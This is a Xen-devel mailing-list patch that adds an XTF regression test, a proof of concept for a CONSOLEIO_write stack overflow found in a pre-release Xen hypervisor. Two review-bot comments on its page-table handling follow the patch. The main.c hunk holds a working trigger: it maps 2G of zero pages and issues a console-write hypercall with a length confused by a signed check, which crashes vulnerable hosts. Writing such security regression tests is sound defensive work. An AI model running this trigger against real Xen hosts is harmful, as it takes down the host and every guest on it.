From: Andrew Cooper
Date: Fri, 29 Nov 2019 14:35:09 +0000
Message-ID: <20191129143509.26528-1-andrew.cooper3@citrix.com>
In-Reply-To: <5766dd2b-2aa7-bafe-56ad-3ea33ddf4591@suse.com>
Subject: [Xen-devel] [PATCH XTF] CONSOLEIO_write stack overflow PoC

Classify it as an XSA test (which arguably ought to be named 'security'), despite no XSA being issued.
Signed-off-by: Andrew Cooper Reviewed-by: Jan Beulich --- docs/all-tests.dox | 2 ++ tests/xsa-consoleio-write/Makefile | 9 +++++ tests/xsa-consoleio-write/main.c | 69 ++++++++++++++++++++++++++++++++++= ++++ 3 files changed, 80 insertions(+) create mode 100644 tests/xsa-consoleio-write/Makefile create mode 100644 tests/xsa-consoleio-write/main.c diff --git a/docs/all-tests.dox b/docs/all-tests.dox index 50429127..bcf9b7ed 100644 --- a/docs/all-tests.dox +++ b/docs/all-tests.dox @@ -143,6 +143,8 @@ XSA-293 - See @ref test-pv-fsgsbase. @subpage test-xsa-298 - missing descriptor table limit checking in x86 PV emulation. =20 +@subpage test-xsa-consoleio-write - CONSOLEIO_write stack overflow + =20 @section index-utility Utilities =20 diff --git a/tests/xsa-consoleio-write/Makefile b/tests/xsa-consoleio-write= /Makefile new file mode 100644 index 00000000..d189b4de --- /dev/null +++ b/tests/xsa-consoleio-write/Makefile @@ -0,0 +1,9 @@ +include $(ROOT)/build/common.mk + +NAME :=3D xsa-consoleio-write +CATEGORY :=3D xsa +TEST-ENVS :=3D hvm32pae + +obj-perenv +=3D main.o + +include $(ROOT)/build/gen.mk diff --git a/tests/xsa-consoleio-write/main.c b/tests/xsa-consoleio-write/m= ain.c new file mode 100644 index 00000000..f10a6256 --- /dev/null +++ b/tests/xsa-consoleio-write/main.c 
@@ -0,0 +1,69 @@ +/** + * @file tests/xsa-consoleio-write/main.c + * @ref test-xsa-consoleio-write + * + * This issue was discovered before it made it into any released version of + * Xen. Therefore, no XSA or CVE was issued. + * + * A bugfix in Xen 4.13 altered CONSOLEIO_write to tolerate passing NUL + * characters intact, as this is a requirement for various TTY setups. + * + * A signed-ness issue with the length calculation lead to a case where Xen + * will copy between 2 and 4G of guest provided data into a 128 byte objec= t on + * the stack. + * + * @see tests/xsa-consoleio-write/main.c + */ +#include + +const char test_title[] =3D "CONSOLEIO_write stack overflow PoC"; + +uint8_t zero_page[PAGE_SIZE] __page_aligned_bss; + +/* Have the assembler build an L1/L2 pair mapping zero_page[] many times. = */ +asm (".section \".data.page_aligned\", \"aw\";" + ".align 4096;" + + "l1t:" + ".rept 512;" + ".long zero_page + "STR(PF_SYM(AD, P))", 0;" + ".endr;" + ".size l1t, . - l1t;" + ".type l1t, @object;" + + "l2t:" + ".rept 512;" + ".long l1t + "STR(PF_SYM(AD, P))", 0;" + ".endr;" + ".size l2t, . - l2t;" + ".type l2t, @object;" + + ".previous;" + ); +extern intpte_t l2t[512]; + +void test_main(void) +{ + /* Map 2G worth of zero_page[] starting from 1G... */ + pae_l3_identmap[1] =3D pae_l3_identmap[2] =3D pte_from_virt(l2t, PF_SY= M(AD, P)); + + /* + * ... , write those zeros with a length possible to be confused by a + * signed bounds check... + */ + hypercall_console_write(_p(GB(1)), 0x80000000); + + /* ... and if Xen is still alive, it didn't trample over its own stack= . */ + + xtf_success("Success: Not vulnerable to CONSOLEIO_write stack overflow= \n"); +} + +/* + * Local variables: + * mode: C + * c-file-style: "BSD" + * c-basic-offset: 4 + * tab-width: 4 + * indent-tabs-mode: nil + * End: + */ --=20 2.11.0 _______________________________________________ Xen-devel mailing list Xen-devel@lists.xenproject.org https://lists.xenproject.org/mailman/listinfo/xen-devel
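Review bot: `TEST-ENVS := hvm32pae` in the Makefile hunk restricts the test to one environment without saying why. The main.c hunk builds 32-bit PAE page tables by hand (8-byte entries emitted as `.long ..., 0` pairs) and patches `pae_l3_identmap`, so the restriction follows from the page-table construction rather than from the bug itself; a one-line comment in the Makefile or in the test header stating that the PoC only constructs PAE tables would save the next reader from wondering whether the other environments are unaffected.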
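Review bot: in the main.c hunk, `test_main()` rewrites `pae_l3_identmap[1]` and `pae_l3_identmap[2]` in place and never reloads CR3. Under PAE paging the four PDPTEs are loaded into the processor only when CR3 is written, so the guest's own hardware walks will not see the new 1G-3G mapping; the test presumably only needs Xen's copy from guest memory to see it, but that reliance deserves a comment beside the assignment (or a CR3 reload, which costs nothing). Two nits in the file header: `lead to` should be `led to`, and it is worth stating that a vulnerable hypervisor takes the host down rather than reaching an `xtf_failure()`, since the `xtf_success()` call is the only reportable outcome.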